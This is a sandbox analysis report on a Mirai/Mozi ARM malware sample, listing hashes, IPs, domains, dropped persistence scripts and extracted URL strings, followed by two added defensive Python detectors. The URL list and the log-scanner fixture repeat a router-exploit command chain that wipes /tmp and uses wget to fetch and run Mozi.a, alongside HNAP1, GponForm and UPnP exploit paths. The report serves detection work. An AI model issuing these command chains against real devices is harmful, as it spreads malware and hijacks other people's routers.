
ZFvtIZszMd

Status: finished
Submission Time: 2022-01-21 04:08:12 +01:00
Verdict: Malicious
Classification: Spreader, Trojan, Evader, Mirai

Tags

  • 32
  • arm
  • elf
  • mirai

Details

  • Analysis ID:
    557423
  • API (Web) ID:
    924938
  • Analysis Started:
    2022-01-21 04:31:53 +01:00
  • Analysis Finished:
    2022-01-21 04:40:07 +01:00
  • MD5:
    ddba92dcf5c5fd7b791f6278a3e20fb8
  • SHA1:
    635075a22cd4e3ade3583d4e9787a09b06e50b76
  • SHA256:
    bc08d8a3541834634fa5fd606805ee6e24cd07575af27bbcbb8ad02247cccd38
  • Technologies:

Joe Sandbox
  • Detection: malicious
  • Score: 100
  • System: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)

Note: the sample is a 32-bit ARM ELF (see Tags), so on this x64 guest it ran under emulation; timing, anti-analysis and device-specific behaviour may differ on real ARM hardware.

Third Party Analysis Engines
  • malicious (Score: 40/60)
  • malicious (Score: 17/35)
  • malicious (Score: 26/43)

IPs

IP | Country
13.238.47.38 | United States
17.54.72.65 | United States
142.114.10.196 | Canada
119.113.120.170 | China
184.126.156.228 | United States
171.112.185.78 | China
132.17.157.215 | United States
65.235.104.115 | United States
46.146.25.135 | Russian Federation
161.52.123.70 | Sweden
46.230.96.252 | Saudi Arabia
79.22.69.125 | Italy
181.211.64.157 | Ecuador
194.190.206.103 | Russian Federation
197.23.125.151 | Tunisia
222.92.234.116 | China
193.1.101.106 | Ireland
22.14.164.25 | United States
221.88.134.158 | Japan
88.248.201.54 | Turkey
112.193.89.217 | China
83.34.29.8 | Spain
117.196.55.244 | India
64.208.187.179 | United States
14.12.94.24 | Japan
106.25.199.66 | China
221.104.48.126 | Japan
191.71.196.147 | Colombia
140.96.96.109 | Taiwan; Republic of China (ROC)
188.115.214.179 | Armenia
91.125.84.41 | United Kingdom
146.51.174.99 | Japan
92.189.120.221 | France
143.95.128.28 | United States
155.108.107.202 | United States
107.234.200.0 | United States
30.223.214.12 | United States
70.107.151.243 | United States
39.179.39.95 | China
189.212.242.229 | Mexico
166.57.155.129 | United States
219.253.38.248 | Korea Republic of
67.165.181.82 | United States
4.67.109.111 | United States
16.112.202.2 | United States
207.249.235.141 | Mexico
38.197.168.247 | United States
142.178.73.14 | Canada
154.249.187.10 | Algeria
218.50.238.88 | Korea Republic of
175.239.97.66 | Korea Republic of
97.54.207.224 | United States
142.81.176.61 | Canada
195.61.161.173 | European Union
89.94.62.166 | France
185.18.207.206 | Israel
84.71.242.96 | United Kingdom
83.25.227.199 | Poland
7.193.28.254 | United States
204.45.126.208 | United States
157.207.132.147 | United States
194.218.177.186 | Sweden
91.212.82.117 | unknown
26.56.43.205 | United States
3.65.136.88 | United States
200.55.162.24 | Cuba
82.40.120.62 | United Kingdom
105.214.241.254 | South Africa
213.243.254.10 | Italy
88.225.4.102 | Turkey
2.51.74.234 | United Arab Emirates
86.199.245.5 | France
118.185.13.53 | India
177.73.251.61 | Brazil
135.242.188.8 | United States
134.109.132.112 | Germany
130.175.68.192 | United States
37.148.152.25 | Germany
192.144.81.128 | Bangladesh
186.134.33.191 | Argentina
181.183.102.130 | Venezuela
76.189.201.245 | United States
17.209.94.162 | United States
186.127.250.135 | Argentina
51.67.184.58 | United Kingdom
40.111.74.139 | United States
166.178.154.91 | United States
20.57.184.167 | United States
167.13.252.185 | United States
17.195.182.102 | United States
140.92.187.172 | Taiwan; Republic of China (ROC)
88.60.130.88 | Italy
160.108.162.20 | United States
121.93.165.47 | Japan
129.19.234.207 | United States
133.116.187.207 | Japan
208.140.180.142 | United States
207.76.206.157 | United States
181.33.35.31 | Colombia
94.140.191.157 | Belgium

Note: given the Spreader classification and the spread of these addresses across unrelated networks and countries, they are most likely targets of the sample's own scanning rather than command-and-control infrastructure; block-listing them wholesale would mostly hit other victims or arbitrary hosts.

Domains

Domain | IP
dht.transmissionbt.com | 87.98.162.88
bttracker.acc.umu.se | 130.239.18.158
router.bittorrent.com | 67.215.246.10
router.utorrent.com | 82.221.103.244
bttracker.debian.org | 0.0.0.0

Note: these are public BitTorrent DHT bootstrap and tracker hosts. Mozi (named in the URL strings below) joins the BitTorrent DHT for its peer-to-peer network, so DNS lookups of these names from a router, DVR or server that runs no torrent client are a strong indicator even though the hosts themselves are benign. bttracker.debian.org resolved to 0.0.0.0 in this run.

URLs

URL
http://2.178.219.63:80/HNAP1/
http://54.84.181.34:80/HNAP1/
http://%s:%d/bin.sh
http://52.73.33.104:80/HNAP1/
http://52.4.18.169:80/HNAP1/
http://52.232.110.39:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://23.208.233.170:80/HNAP1/
http://23.208.34.61:80/HNAP1/
http://45.8.220.39:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://187.157.44.71:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:5555/UD/act?1
http://184.25.176.127:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://161.71.2.41:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://64.34.159.178:80/HNAP1/
http://104.101.170.129:80/HNAP1/
http://3.20.201.243:80/HNAP1/
http://207.154.230.111:80/HNAP1/
http://45.144.3.201:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://190.166.198.45:80/HNAP1/
http://%s:%d/bin.sh;chmod
http://83.142.198.185:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://185.199.110.112:80/HNAP1/
http://200.123.205.169:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://52.72.158.238:80/HNAP1/
http://23.12.89.25:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
http://www.alsa-project.org
http://127.0.0.1sendcmd
https://ubuntu.com/blog/microk8s-memory-optimisation
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://ipinfo.io/ip
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://%s:%d/Mozi.a;chmod
http://www.pastebin.ca
http://purenetworks.com/HNAP1/
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://www.alsa-project.org.
http://HTTP/1.1
http://pastebin.ca)
http://schemas.xmlsoap.org/soap/envelope//
http://34.98.66.83:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://46.254.184.147:80/HNAP1/
http://www.alsa-project.org/cardinfo-db/
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://%s:%d/Mozi.m
http://www.alsa-project.org/alsa-info.sh
http://%s:%d/Mozi.m;
http://%s:%d/Mozi.a;sh$
http://www.pastebin.ca.
http://www.pastebin.ca/upload.php
http://168.176.61.231:80/HNAP1/
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://210.117.103.177:49152/soap.cgi?service=WANIPConn1
http://schemas.xmlsoap.org/soap/envelope/
http://127.0.0.1:80/GponForm/diag_Form?images/
http://%s:%d/Mozi.m;$
http://schemas.xmlsoap.org/soap/encoding/
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://127.0.0.1
http://127.0.0.1:7574/UD/act?1
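The request paths in the list above (/HNAP1/, the /shell?cd+/tmp;... command chain, GponForm/diag_Form, soap.cgi?service=WANIPConn1 and /UD/act?1) are what a defender can match in web-server or honeypot logs. The example below is added for this page and is not Joe Sandbox output or code from the sample: it scans constructed access-log lines for those paths and recovers the stager URL from the plus-encoded command chain. Two caveats the list itself supports: the `%s:%d` entries show the download host:port is filled in at runtime, so the literal `192.168.1.1:8088` is not a usable indicator and the code matches on paths only; and entries such as alsa-project.org, pastebin.ca and kernel.org appear to come from stock system scripts in the dropped-file table rather than from the sample, so they are deliberately not in the pattern set. The log lines use RFC 5737 documentation addresses and are constructed.

```python
"""Flag web requests that use the exploitation paths in this report's URL
list and recover the stager URL from the command chain. Added example; the
log lines below are constructed, not captured from the sandbox run."""
import re
from urllib.parse import unquote_plus

# Request paths taken from the URL list above. Hosts in those strings are
# runtime placeholders (%s:%d) or a private address, so only paths are matched.
EXPLOIT_PATTERNS = {
    "hnap1":      re.compile(r"^/HNAP1/?$"),
    "jaws_shell": re.compile(r"^/shell\?cd\+/tmp;"),
    "gpon_diag":  re.compile(r"^/GponForm/diag_Form\?"),
    "upnp_soap":  re.compile(r"^/soap\.cgi\?service=WANIPConn1"),
    "ud_act":     re.compile(r"^/UD/act\?1"),
}

# Download in the decoded command chain, e.g. "wget http://192.168.1.1:8088/Mozi.a".
STAGER_RE = re.compile(r"(?:wget|curl)\s+(?:-\S+\s+)*(https?://\S+?/(\S+?))(?=[;\s]|$)")

# Apache/nginx combined format: client - - [time] "METHOD path PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed access-log lines (RFC 5737 documentation addresses), not sandbox data.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jan/2022:04:32:10 +0100] "POST /HNAP1/ HTTP/1.1" 404 162',
    '203.0.113.7 - - [21/Jan/2022:04:32:11 +0100] "GET /shell?cd+/tmp;rm+-rf+*;'
    'wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 200 0',
    '198.51.100.9 - - [21/Jan/2022:04:33:02 +0100] "GET /index.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [21/Jan/2022:04:33:40 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 0',
]


def classify_request(path):
    """Name of the exploit family the request path matches, or None."""
    for name, rx in EXPLOIT_PATTERNS.items():
        if rx.search(path):
            return name
    return None


def extract_stager(path):
    """(url, filename) of the payload the command chain fetches, or None.
    '+' stands in for a space in these requests; unquote_plus restores it."""
    if "?" not in path:
        return None
    cmd = unquote_plus(path.split("?", 1)[1])
    m = STAGER_RE.search(cmd)
    return (m.group(1), m.group(2)) if m else None


def scan_log(lines):
    """One finding per request whose path matches an exploit pattern."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        client, when, method, path, status = m.groups()
        kind = classify_request(path)
        if kind is None:
            continue
        findings.append({"client": client, "time": when, "method": method,
                         "status": int(status), "kind": kind,
                         "stager": extract_stager(path)})
    return findings


def clients_by_kind(findings):
    """Map exploit family -> sorted list of client addresses that tried it."""
    out = {}
    for f in findings:
        out.setdefault(f["kind"], set()).add(f["client"])
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['kind']} status={f['status']} stager={f['stager']}")
```

A hit on /HNAP1/ alone is also produced by benign scanners and by devices that legitimately speak HNAP; the /shell? chain and the GponForm path carry the exploit payload and are the higher-confidence signals. The sandbox shows only that the sample holds these request templates, not that any target was compromised.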

Dropped files

Only four entries are not stock Ubuntu 20.04 files: /etc/init.d/S95baby.sh and /etc/rcS.d/S95baby.sh (boot-time start scripts, i.e. persistence), /usr/networks (the ARM ELF) and /tmp/.config. The remaining entries are existing system scripts the sandbox recorded as written during the run; the page does not show what was changed in them.

Path | File Type
/etc/init.d/S95baby.sh | POSIX shell script, ASCII text executable
/etc/profile.d/cedilla-portuguese.sh | ASCII text
/etc/profile.d/bash_completion.sh | ASCII text
/etc/profile.d/apps-bin-path.sh | ASCII text
/etc/profile.d/Z99-cloudinit-warnings.sh | ASCII text
/etc/profile.d/Z99-cloud-locale-test.sh | ASCII text
/etc/profile.d/Z97-byobu.sh | ASCII text
/etc/profile.d/01-locale-fix.sh | ASCII text
/etc/init.d/keyboard-setup.sh | ASCII text
/etc/init.d/hwclock.sh | ASCII text
/etc/init.d/console-setup.sh | ASCII text
/usr/bin/rescan-scsi-bus.sh | ASCII text
/usr/networks | ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
/etc/profile.d/gawk.sh | ASCII text
/etc/profile.d/im-config_wayland.sh | ASCII text
/etc/profile.d/vte-2.91.sh | ASCII text
/etc/profile.d/xdg_dirs_desktop_session.sh | ASCII text
/etc/rcS.d/S95baby.sh | POSIX shell script, ASCII text executable
/usr/bin/gettext.sh | ASCII text
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh | ASCII text
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh | ASCII text
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh | ASCII text
/usr/share/doc/netcat-openbsd/examples/dist.sh | ASCII text
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh | ASCII text
/usr/share/doc/python3-colorama/examples/demo.sh | ASCII text
/usr/share/doc/python3-serial/examples/port_publisher.sh | ASCII text
/usr/share/doc/sg3-utils/examples/sg_persist_tst.sh | ASCII text
/usr/share/doc/git/contrib/git-resurrect.sh | ASCII text
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh | ASCII text
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh | ASCII text
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh | ASCII text
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh | ASCII text
/usr/share/doc/git/contrib/vscode/init.sh | ASCII text
/usr/share/doc/git/contrib/update-unicode/update_unicode.sh | ASCII text
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh | ASCII text
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh | ASCII text
/usr/share/doc/git/contrib/subtree/git-subtree.sh | ASCII text
/usr/share/doc/git/contrib/rerere-train.sh | ASCII text
/usr/share/doc/git/contrib/remotes2config.sh | ASCII text
/usr/share/doc/gawk/examples/prog/igawk.sh | awk or perl script, ASCII text
/usr/src/linux-headers-5.4.0-81/Documentation/features/list-arch.sh | ASCII text
/usr/src/linux-headers-5.4.0-81/arch/arm64/boot/install.sh | ASCII text
/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscalltbl.sh | ASCII text
/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscallnr.sh | ASCII text
/usr/src/linux-headers-5.4.0-81/arch/arm/tools/syscallhdr.sh | ASCII text
/usr/src/linux-headers-5.4.0-81/arch/arm/boot/install.sh | ASCII text
/usr/src/linux-headers-5.4.0-81/arch/arm/boot/deflate_xip_data.sh | ASCII text
/usr/src/linux-headers-5.4.0-81/Documentation/sound/cards/multisound.sh | C source, ASCII text
/usr/src/linux-headers-5.4.0-81/Documentation/s390/config3270.sh | ASCII text
/usr/src/linux-headers-5.4.0-81/Documentation/features/scripts/features-refresh.sh | ASCII text
/usr/share/doc/xdotool/examples/ffsp.sh | ASCII text
/usr/src/linux-headers-5.4.0-81/Documentation/arm64/kasan-offsets.sh | ASCII text
/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/udev-install.sh | ASCII text
/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/status.sh | ASCII text
/usr/src/linux-headers-5.4.0-81/Documentation/admin-guide/aoe/autoload.sh | ASCII text
/usr/share/vim/vim81/macros/less.sh | ASCII text
/usr/share/session-migration/scripts/01-usd-migration-monitors-xml.sh | ASCII text
/usr/share/os-prober/common.sh | ASCII text
/usr/share/lightdm/guest-session/setup.sh | ASCII text
/usr/share/hplip/hplip_clean.sh | ASCII text
/etc/wpa_supplicant/action_wpa.sh | ASCII text
/usr/share/cups/braille/index.sh | ASCII text
/usr/share/cups/braille/cups-braille.sh | ASCII text, with CR, LF line terminators
/usr/share/brltty/initramfs/brltty.sh | ASCII text
/usr/share/alsa/utils.sh | ASCII text
/usr/share/alsa-base/alsa-info.sh | ASCII text, with very long lines
/usr/share/PackageKit/helpers/test_spawn/search-name.sh | ASCII text
/tmp/.config | ASCII text
/etc/wpa_supplicant/ifupdown.sh | ASCII text
/etc/wpa_supplicant/functions.sh | ASCII text
/usr/share/cups/braille/indexv3.sh | ASCII text
/etc/gdm3/config-error-dialog.sh | ASCII text
/etc/console-setup/cached_setup_terminal.sh | ASCII text
/etc/console-setup/cached_setup_keyboard.sh | ASCII text
/etc/console-setup/cached_setup_font.sh | ASCII text
/etc/acpi/undock.sh | ASCII text
/etc/acpi/tosh-wireless.sh | ASCII text
/etc/acpi/ibm-wireless.sh | ASCII text
/etc/acpi/asus-wireless.sh | ASCII text
/etc/acpi/asus-keyboard-backlight.sh | ASCII text
/usr/share/doc/gawk/examples/network/PostAgent.sh | ASCII text
/usr/share/doc/git/contrib/diff-highlight/t/t9400-diff-highlight.sh | ASCII text
/usr/share/doc/git/contrib/credential/netrc/t-git-credential-netrc.sh | ASCII text
/usr/share/doc/git/contrib/coverage-diff.sh | ASCII text
/usr/share/doc/gdb/contrib/words.sh | ASCII text
/usr/share/doc/gdb/contrib/gdb-add-index.sh | ASCII text
/usr/share/doc/gdb/contrib/expect-read1.sh | ASCII text
/usr/share/doc/gdb/contrib/ari/gdb_find.sh | ASCII text
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh | ASCII text
/boot/grub/i386-pc/modinfo.sh | ASCII text
/usr/share/doc/git/contrib/fast-import/git-import.sh | ASCII text
/usr/share/doc/cron/examples/cron-tasks-review.sh | ASCII text
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh | ASCII text
/usr/share/doc/bubblewrap/examples/flatpak-run.sh | ASCII text
/usr/share/doc/bubblewrap/examples/bubblewrap-shell.sh | ASCII text
/usr/share/doc/acpid/examples/powerbtn.sh | ASCII text
/usr/share/doc/acpid/examples/default.sh | ASCII text
/usr/share/doc/acpid/examples/ac.sh | ASCII text
/usr/share/debconf/confmodule.sh | ASCII text
/usr/share/cups/braille/indexv4.sh | ASCII text
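The four sample-specific paths in the table (/etc/init.d/S95baby.sh, /etc/rcS.d/S95baby.sh, /usr/networks and /tmp/.config), the ELF type the table gives for /usr/networks and the hashes in the Details section are enough for a host-side check. The example below is added for this page and is not sandbox output: it sweeps a filesystem root for those paths, checks whether a file found there carries the ELF 32-bit LSB ARM header, and compares hashes with the sample's. The fixture built by make_fixture() is constructed (a stub init script and a bare ELF header, not the real sample); the content of the real S95baby.sh is not shown on this page and is not assumed.

```python
"""Sweep a filesystem root for the persistence artifacts this report lists,
check whether a binary found there is the 32-bit little-endian ARM ELF the
report describes, and compare its hashes with the sample's. Added example,
not sandbox output. The tree built by make_fixture() is constructed."""
import hashlib
import os
import struct
import tempfile

# Hashes from the Details section of this report.
SAMPLE_HASHES = {
    "md5": "ddba92dcf5c5fd7b791f6278a3e20fb8",
    "sha1": "635075a22cd4e3ade3583d4e9787a09b06e50b76",
    "sha256": "bc08d8a3541834634fa5fd606805ee6e24cd07575af27bbcbb8ad02247cccd38",
}

# Entries from the dropped-file table that are not stock Ubuntu files.
IOC_PATHS = ["etc/init.d/S95baby.sh", "etc/rcS.d/S95baby.sh", "usr/networks", "tmp/.config"]

EM_ARM = 0x28  # e_machine value for 32-bit ARM


def elf_summary(head):
    """'ELF <bits> <endian> e_machine=0x..' if head starts an ELF file, else None."""
    if len(head) < 20 or head[:4] != b"\x7fELF":
        return None
    bits = {1: "32-bit", 2: "64-bit"}.get(head[4], "class?")
    endian = {1: "LSB", 2: "MSB"}.get(head[5], "data?")
    e_machine = struct.unpack("<H" if head[5] == 1 else ">H", head[18:20])[0]
    return f"ELF {bits} {endian} e_machine=0x{e_machine:x}"


def is_arm32_lsb(head):
    """True for the class/data/machine combination the report lists for /usr/networks."""
    return (len(head) >= 20 and head[:4] == b"\x7fELF" and head[4] == 1
            and head[5] == 1 and struct.unpack("<H", head[18:20])[0] == EM_ARM)


def hash_file(path):
    """MD5/SHA1/SHA256 of a file, read in chunks so large binaries are fine."""
    digests = {name: hashlib.new(name) for name in SAMPLE_HASHES}
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            for d in digests.values():
                d.update(chunk)
    return {name: d.hexdigest() for name, d in digests.items()}


def sweep(root="/"):
    """One finding per IOC path present under root (pass a mount point for an image)."""
    findings = []
    for rel in IOC_PATHS:
        full = os.path.join(root, rel)
        if not os.path.lexists(full):
            continue
        finding = {"path": "/" + rel, "elf": None, "arm32_elf": False, "hash_match": False}
        if os.path.isfile(full):
            with open(full, "rb") as fh:
                head = fh.read(64)
            finding["elf"] = elf_summary(head)
            finding["arm32_elf"] = is_arm32_lsb(head)
            digests = hash_file(full)
            finding["sha256"] = digests["sha256"]
            finding["hash_match"] = digests == SAMPLE_HASHES
        findings.append(finding)
    return findings


def make_fixture():
    """Constructed test tree: a stub init script and a 64-byte ARM32 ELF header,
    not the real sample. Returns the temporary root."""
    root = tempfile.mkdtemp(prefix="mozi-sweep-")
    os.makedirs(os.path.join(root, "etc/init.d"))
    os.makedirs(os.path.join(root, "usr"))
    with open(os.path.join(root, "etc/init.d/S95baby.sh"), "w") as fh:
        fh.write("#!/bin/sh\n")  # real script content is not shown on this page
    # e_ident: magic, EI_CLASS=1 (32-bit), EI_DATA=1 (LSB), EI_VERSION=1, padding;
    # then e_type=2 (EXEC) and e_machine=0x28 (ARM); remainder zero-filled.
    head = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\x00" * 8 + b"\x02\x00" + b"\x28\x00"
    with open(os.path.join(root, "usr/networks"), "wb") as fh:
        fh.write(head.ljust(64, b"\x00"))
    return root


if __name__ == "__main__":
    for finding in sweep(make_fixture()):
        print(finding)
```

Run `sweep("/")` on a live host or `sweep("/mnt/image")` on a mounted firmware or disk image. A 32-bit ARM ELF under /usr/networks on an x86 server is anomalous on its own; a hash match ties it to this exact sample, while a mismatch with the ARM header still present most likely means another build of the same family, so treat the path hits as the primary signal and the hashes as confirmation.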